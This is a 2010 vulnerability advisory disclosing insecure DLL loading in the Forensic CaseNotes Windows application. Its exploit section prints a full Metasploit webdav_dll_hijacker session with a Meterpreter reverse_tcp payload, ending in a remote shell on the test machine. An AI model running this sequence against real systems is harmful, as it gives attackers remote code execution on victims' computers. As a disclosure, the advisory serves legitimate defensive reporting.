Advisory: Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
- in a nutshell:
---------------------------------------------
Forensic CaseNotes - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- Forensic CaseNotes Description
The purpose of CaseNotes is to provide a single lightweight application program to run on the Microsoft Windows platform to allow forensic analysts and examiners of any discipline to securely record their contemporaneous notes electronically.
- Insecure Library Loading Allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS notes"
For more vulnerability details please check the links in the reference section.
- Affected Versions
1.0.2007.8/1.3.2010.6 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
http://www.qccis.com/forensic-tools
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS notes
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS notes yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 10.8.28.9 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.8.28.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.
<snip>
[*] 10.8.28.55:49194 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49194 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49194 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49194 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49194 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49194 GET => DLL Payload
[*] 10.8.28.55:49194 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49194 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 2 opened (10.8.28.9:4444 -> 10.8.28.55:49200) at Sun Aug 29 20:43:39 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
Recent comments
2 weeks 6 days ago
2 weeks 6 days ago
3 weeks 5 days ago
4 weeks 1 day ago
10 weeks 4 days ago
11 weeks 2 days ago
12 weeks 2 days ago
12 weeks 2 days ago
12 weeks 5 days ago
12 weeks 6 days ago